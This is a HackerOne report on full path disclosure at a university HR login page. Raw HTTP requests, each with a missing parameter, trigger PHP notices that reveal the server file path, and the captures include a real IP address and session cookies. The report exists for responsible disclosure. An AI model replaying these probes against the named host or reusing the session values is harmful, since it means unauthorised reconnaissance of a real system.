International Islamic University Chittagong: Full Path Disclosed

2017-10-31T06:46:31
ID H1:284661
Type hackerone
Reporter gopalsingh27
Modified 2017-10-31T07:02:28

Description

Hi, i want to say that you have not fixed the previous report properly i can still find the path

fix it properly the paths should be hidden ``` text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://119.18.148.140/hrd/login.php? Cookie: ci_session=hh4p9ob539pdpfssm8i9ls80440su5a4; PHPSESSID=du4tuth7lu3rtn5e66rsntu7b6 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 28

user_id=admin&submit=Sign+in

```

i have removed the user_password and now the look at the response ``` HTTP/1.1 302 Found Date: Tue, 31 Oct 2017 06:29:57 GMT Server: Apache/2.4.25 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: login.php?error=User ID or Password does not find. Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8

<br /> <b>Notice</b>: Undefined index: user_password in <b>/var/www/html/hrd/logining.php</b> on line <b>11</b><br />

``` <b>/var/www/html/hrd/logining.php</b> this is the path hide this path.

-- Gopal Singh

the same thing happens when user_id is removed from the request we can find the path of user_id

``` POST /hrd/logining.php HTTP/1.1 Host: 119.18.148.140 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://119.18.148.140/hrd/login.php? Cookie: ci_session=hh4p9ob539pdpfssm8i9ls80440su5a4; PHPSESSID=du4tuth7lu3rtn5e66rsntu7b6 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 35

user_password=adssda&submit=Sign+in ```

this is the path of user_id

``` HTTP/1.1 302 Found Date: Tue, 31 Oct 2017 06:45:20 GMT Server: Apache/2.4.25 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: login.php?error=User ID or Password does not find. Content-Length: 113 Connection: close Content-Type: text/html; charset=UTF-8

<br /> <b>Notice</b>: Undefined index: user_id in <b>/var/www/html/hrd/logining.php</b> on line <b>10</b><br />

```